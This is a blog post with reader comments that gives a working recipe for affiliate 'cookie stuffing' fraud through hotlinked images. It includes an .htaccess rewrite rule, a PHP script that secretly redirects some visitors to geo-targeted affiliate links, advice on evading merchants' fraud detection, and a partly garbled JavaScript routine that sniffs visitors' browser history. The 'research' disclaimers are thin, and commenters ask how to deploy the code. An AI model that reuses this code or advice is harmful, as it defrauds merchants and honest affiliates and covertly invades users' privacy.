Home | Archive | Contact

Geo-Targeted Image Based Cookie Stuffing

People are lazy so I write this first
This (research) based post will demonstrate the techniques behind stuffing affiliate cookies via images, on any website you can post images (think forums), how to get other people to do this for you and how to geographically target cookie stuffing.

Zonk. Back in 2007 I did a post about making money with affiliates by cookie stuffing. While nobody admits to cookie stuffing, it turns out you’re all lying shits as that post gets more search traffic than anything else.

Personally, I think cookie stuffing is low, I wouldn’t recommend it or condone it. It’s probably illegal (ebay certainly think so) and you’ll probably go to hell in the afterlife.

Oh, you’ll probably get caught too if you used lame iframe techniques, so for research purposes only I want to explain how to turn cookie stuffing up a notch, if you were silly enough to do such a thing.

iFrames are so 1990s
I’d be quite happy never to see an iframe again, even though I’m sure there’s going to be a rebirth as SEOmoz said it was a possible route to sculpt pagerank after the no-follow actually doesn’t sculpt anything admission from Mr. Cutts.

Yea, so don’t use them.

Serving cookies through images
You can actually serve cookies through images (sort of). It’s a lot more sneaky and it means you can essentially serve a cookie to anywhere you can post HTML.

I’ve seen people propagate this by encouraging people to hotlink as well. So for instance, auto-generating a celebrity photo gallery and offering embed codes. Visitors merrily go about posting images all over the web while they are secretly serving cookies.

So there’s a mechanism to automatically propagate cookies all over the interwebs.

Geo-targeting cookie stuffing
Conversion rate is one (of a few) indicators that are watched to try and rumble cookie stuffers. You need to do everything you can to make sure your conversion rate is as high as possible. So, let’s start with geo-targeting. It’s no good serving cookies to Americans for ebay UK or serving ebay.com cookies for Italians. You get the idea. So detecting what country your visitor is from and serving the correct cookie increases your chance of a cookie stuff vs conversion.

Cookie stuffing images with .htaccess
Okay, we’re going to have to intercept image requests and redirect them to a script to decide if and which cookie to stuff.

The below .htaccess file will grab requests that do not originate from your site or search bots and pass them to a serveimage php file.

Options +FollowSymLinks 

RewriteEngine on 

# Let's not cookie stuff our own visitors!

RewriteCond %{HTTP_REFERER} !^$ [NC]

# If the request is outside of your site

RewriteCond %{HTTP_REFERER} !^http://([^.]+\.)?mywebsite\.com/ [NC]

# If the request is not from a few bots (pretty basic, add to this!)

RewriteCond %{HTTP_USER_AGENT} !(googlebot-image|msnbot|psbot|yahoo-mmcrawler) [NC]

# Grab the image name, extension type, go to our serveimage.php file

RewriteRule ^images/([a-zA-Z0-9]+).(bmp|gif|jpe?g|png)$ /serveimage.php?img=$1&ext=$2 [L]

Cookie stuffing images with PHP
So now we’re passing image requests to serveimage.php, you need to have the following in place:

<?php


//Get the image name from request
$ext = $_GET['ext'];
$path = "images/".$_GET['img'].".".$_GET['ext'];

	
// Decide if we should stuff our lucky visitor with a cookie

//Let's generate a random number
$rand = mt_rand(0, 1000); 

// See if it is a lucky request
// You can change percentage by changing $rand<??; 5=0.5%, 10=1%, 100=10% etc
// 10% chance to serve cookie instead of image

if ($rand<100) { cookie_stuff(); } else {spit_it_out($ext,$path);}


//Functions

// Forget it - serve them an image!

function spit_it_out($ext, $path) {
header("Cache-Control: no-cache");
header("Pragma: no-cache");
if ($ext=='jpeg'|$ext=='jpg') {
header("Content-type: image/jpeg");
} else if ($ext=='gif') {
header("Content-type: image/gif");
} else if ($ext=='bmp') {
header("Content-type: image/bmp");
} else {
header("Content-type: image/png");
}
readfile('http://'.$_SERVER["SERVER_NAME"].'/'.$path) or die("error!");
exit;
}



// We have a winner! Stuff a cookie
		
function cookie_stuff() {
$ip = $_SERVER['REMOTE_ADDR'];
if (isset($ip)) {

// Work out what country they are in
$country = file_get_contents("http://api.hostip.info/country.php?ip=$ip"); } else {$country="US";}
if ($country=="UK") {
header('Location: http://YOUR-UKAFFILIATE-LINK'); //UK
}
elseif ($country=="CA") {
header('Location: http://YOUR-CANADA-AFFILIATE-LINK'); //CANADA
}
else {
header('Location: YOUR-USA-AFFILIATE-LINK'); //US

// Add as many countries as you want: http://www.worldatlas.com/aatlas/ctycodes.htm

}
}

?>

So this PHP code will take your hotlinker, and 10% of the time stuff an affiliate cookie for the correct country and 90% of the time correctly serve the image.

You can add as many country codes as you like, you can get a list from WorldAtlas.

I’ve personally seen people make over 1,000 per day when they get creative with cookies, obviously the deeper you stick your hand in the cookie jar, the more likely you are to get caught.

Other security measures and improvements
As the more astute among you have no doubt realised, big boy sites have more layers for detecting cookie stuffing, such as:

1) What page do people land on (always the same page being hit?)

2) How long do they stay on the site on average

3) How many / which pages do they view

4) Some sites double serve a verification file, such as a tiny gif and cross-check you have the image and the cookie

Some of the basic stuff like user agent / IP are covered in this script, but on any scale you’d need to tackle the above issues. Yes, it’s totally possible – just remember, if a human can do it in a browser, you can write a script to do it as well.

Get creative – check the browser history

If you want to raise conversion rates even further, you can check that they’ve visited the site you want to cookie stuff for. If they’ve previously visited the site, it’s much more likely they’ve got an account and are likely to buy.

Here’s some Javascript to check user history (I didn’t write this one)

var agent = navigator.userAgent.toLowerCase();
var is_mozilla = (agent.indexOf("mozilla") != -1);

// popular websites. Lookup if user has visited any.
var websites = [
  "http://list.com/",
  "http://of.com/",
  "http://sites.com/",
  "http://you.com/",
  "http://want.com/",
  "http://to.com/",
  "http://check.com/",
  "http://users.com/",
  "http://history.com/",
  "http://for.com/",
];

/* prevent multiple XSS loads */
if (! document.getElementById('xss_flag')) {

  var d = document.createElement('div');
  d.id = 'xss_flag';
  document.body.appendChild(d);

  var d = document.createElement('table');
  d.border = 0;
  d.cellpadding = 5;
  d.cellspacing = 10;
  d.width = '90%';
  d.align = 'center';
  d.id = 'data';
  document.body.appendChild(d);

  document.write('');
  for (var i = 0; i <>');

  /* launch steal history */

if (is_mozilla) {
  stealHistory();
}

}

function stealHistory() {

  // loop through websites and check which ones have been visited
  for (var i = 0; i < websites.length; i++) {          
         var link = document.createElement("a");       
         link.id = "id" + i;       
         link.href = websites[i];       
         link.innerHTML = websites[i];              
         document.body.appendChild(link);       
         var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");       
         document.body.removeChild(link);       
// check for visited       
     if (color == "rgb(0, 0, 255)") {           
         document.write('' + websites[i] + '');
      } // end visited check
  
  } // end visited website loop

} // end stealHistory method

I hope this post helps merchants and affiliate networks everywhere to tackle cookie stuffers. I’ll do a followup at some point explaining how to mimic user browsing behavior properley.

End thought: Web based e-mail clients can also load images. Chain mails still do well…..

Like this article? Then subscribe to the feed!


Related Posts:


Next Post:
How to make a Twitter bot with no coding

Previous Post:

Get A Free Link In 30 Seconds

17 responses to “Geo-Targeted Image Based Cookie Stuffing”

  • Scooter says:

    Hi,
    Sorry what is the meaning of line 35?
    >> for (var i = 0; i ‘);
    I don’t get it.

    Comment by Scooter
    July 17th, 2009 @ 9:05 pm

  • Scooter says:

    Second sorry on the last script.

    Comment by Scooter
    July 17th, 2009 @ 9:05 pm

  • Allan says:

    If you do not condone cookie stuffing then why are you providing the tools to do so.

    There have been some high profile people caught with their fingers in the cookie jar, no naming names.

    Sure Cookie stuffers will indeed go to hell, the bible is indeed specific when it says thou shalt not stuff thy neighbours cookie.

    The problem is that the people who get hurt here are the honest affiliate marketers, the merchants and networks will still get their share.

    If you want to help the merchants why not just email then what you know.

    Seriously how many newbs are going to cut/paste the code in the hope of making thousands.

    Comment by Allan
    July 18th, 2009 @ 2:16 pm

  • Mark says:

    Supermarkets sell knives, but do they condone stabbing?

    If the level of knowledge was equal, then there wouldn’t be any cookie stuffing.

    Frankly, I barely get time to blog, let alone compiling a list of every merchant and affiliate network and sending them the code. I’m not some kind of internet-missionary spending my days emailing people advice they didn’t ask for.

    You’re also not considering the tens of thousands of websites that build and run their own affiliate schemes in house, how would would you suggest I let them know?

    If you’re that worried, why not share this page with some merchant friends.

    Any affiliate networks that don’t take basic protection against cookie stuffing, really are asking for trouble. Yes, it would be nice if everyone always played by the rules, unfortunately that’s not how the world works.

    I know there’s been high-profile cases – which is why I gave a link to one. The afterlife scares me more, though. 0_o

    Comment by Mark
    July 18th, 2009 @ 2:42 pm

  • Rob says:

    Nice PHP code there, Mark… 😉

    Comment by Rob
    July 20th, 2009 @ 11:17 am

  • mark says:

    I dont know much about javascript, I have been looking at http://www.azarask.in/blog/post/socialhistoryjs/ trying to use a users history to redirect them to an affiliate, any help would be appreciated. I see your code above but what about implementation.

    Comment by mark
    August 12th, 2009 @ 4:04 pm

  • Solez says:

    Could you elaborate on:

    “Some sites double serve a verification file, such as a tiny gif and cross-check you have the image and the cookie”

    I am a little confused about how this is done.

    Thanks, and great post!

    Comment by Solez
    August 26th, 2009 @ 5:44 am

  • busin3ss says:

    Fuck, amazing blog post. Can’t believe I missed it when you posted it.

    Can I write about it @ my blog?

    Comment by busin3ss
    August 27th, 2009 @ 7:26 pm

  • Mark says:

    Does a blackhat need permission? (;

    Comment by Mark
    August 27th, 2009 @ 7:41 pm

  • webandrank says:

    The best and common ingredient is a delicious cookie but don’t cookie to much.

    Comment by webandrank
    September 5th, 2009 @ 10:39 am

  • Mark says:

    Spam fail (:

    Comment by Mark
    September 15th, 2009 @ 2:57 pm

  • Svonrik says:

    Hey, I’m not very good with php so I’d just like to know what details I should change for my own website,

    I know I have to change the affiliate Urls, then what about the image and extensions?

    I see you use $1 and $2 in the htaccess, should I define them?

    For the php script, should I change anything in lines 4 and 5?

    Thanks and hope you will reply, learning something new everyday so I want to test this script to see if it works!

    Comment by Svonrik
    November 17th, 2009 @ 6:27 pm

  • Michael says:

    The history check is indeed a nice method. Didn’t knew it was possible to check the history of a visitor via javascript, there is a whole new world of possibilities when you consider this.

    Comment by Michael
    February 12th, 2010 @ 10:56 pm

  • Sarita Rawat says:

    Nice PHP code.

    Comment by Sarita Rawat
    May 12th, 2010 @ 9:10 am

  • Charles Brown says:

    Cookie stuffing isn’t illegal. There’s nothing written in federal law about cookie stuffing. Sure, it goes against every site’s TOS but there was a recent court case in which it was decided that website TOS doesn’t equal federal law…

    So you can’t go to jail for it, but you can be sued though 😉

    Comment by Charles Brown
    May 22nd, 2010 @ 2:07 am

  • Joe Arroyo says:

    I really liked your article. I just randomly happened to find this website while I was in the process of studying with google search. Wanted to tell you I enjoyed your blog and to keep up on doin what youre doin. Also dont forget, enjoy the adventure.. don’t put too much emphasis on the final result. See ya, Joe Arroyo

    Comment by Joe Arroyo
    August 3rd, 2010 @ 4:26 pm

  • Sam says:

    Thanks for the PHP Code

    Comment by Sam
    January 25th, 2011 @ 10:38 am